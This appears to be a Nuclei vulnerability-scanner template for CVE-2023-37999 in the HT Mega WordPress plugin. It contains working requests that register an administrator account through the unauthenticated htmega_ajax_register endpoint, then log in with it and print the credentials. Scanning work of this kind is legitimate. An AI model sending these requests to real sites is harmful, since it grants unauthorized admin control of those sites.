id: CVE-2023-37999

info:
  name: HT Mega – Absolute Addons for Elementor <= 2.2.0 - Missing Authorization to Privilege Escalation
  author: daffainfo
  severity: critical
  description: |
    The HT Mega plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.2.0. This is due to missing validation of the reg_role parameter on the htmega_ajax_register function. This makes it possible for unauthenticated attackers to create administrator accounts.
  impact: |
    Attackers can escalate privileges, gaining unauthorized access to restricted functionalities or data.
  remediation: |
    Update to the latest version of HT Mega to address the privilege management issue.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor/ht-mega-absolute-addons-for-elementor-220-missing-authorization-to-privilege-escalation
    - https://plugins.trac.wordpress.org/changeset/2934204/ht-mega-for-elementor/trunk/includes/helper-function.php?contextall=1&old=2899662&old_path=%2Fht-mega-for-elementor%2Ftrunk%2Fincludes%2Fhelper-function.php
    - https://patchstack.com/database/vulnerability/ht-mega-for-elementor/wordpress-ht-mega-absolute-addons-for-elementor-plugin-2-2-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37999
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37999
    cwe-id: CWE-269
    epss-score: 0.5198
    epss-percentile: 0.97963
    cpe: cpe:2.3:a:hasthemes:ht_mega:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: hasthemes
    product: ht_mega
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ht-mega-for-elementor"
  tags: cve,cve2023,wordpress,wp,wp-plugin,hasthemes,ht_mega,vkev,ht-mega-for-elementor

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        reg_name={{username}}&reg_password={{password}}&reg_email={{email}}&reg_role=administrator

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Successfully Register")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Login

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(header,"wordpress_logged_in", "/wp-admin")'
          - 'status_code == 302'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + ". Password: "+ password'
# digest: 4a0a00473045022100f5d487a7089cf295afe8971ca036c25a10f0de125df07306ed3cfa12f1f41d65022059167065a19c4446dec7ff50d5e0596c263abdca0fe1ee91c263e1ebd9cbc6d1:922c64590222798bb761d5b6d8e72950